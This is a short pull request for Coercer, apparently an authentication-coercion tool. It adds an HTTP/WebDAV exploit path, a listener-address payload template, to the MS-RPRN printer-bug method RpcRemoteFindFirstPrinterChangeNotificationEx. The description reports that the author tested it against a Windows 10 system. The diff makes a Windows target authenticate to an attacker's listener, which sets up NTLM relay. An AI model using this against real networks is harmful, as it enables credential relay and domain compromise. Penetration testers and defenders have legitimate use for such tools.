### PR TITLE
[enhancement] RPRN also supports HTTP exploit path

### DIFF
--- a/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py
+++ b/coercer/methods/MS_RPRN/RpcRemoteFindFirstPrinterChangeNotificationEx.py
@@ -19,7 +19,8 @@ class RpcRemoteFindFirstPrinterChangeNotificationEx(MSPROTOCOLRPCCALL):
     """
 
     exploit_paths = [
-        ("smb", '\\\\{{listener}}\x00')
+        ("smb", '\\\\{{listener}}\x00'),
+        ("http", '\\\\{{listener}}@80/print\x00')
     ]
 
     access = {


### PR DESCRIPTION
Should also be the case for `RpcRemoteFindFirstPrinterChangeNotification`, but could not confirm as it did not work at all with the used Windows 10 testsystem.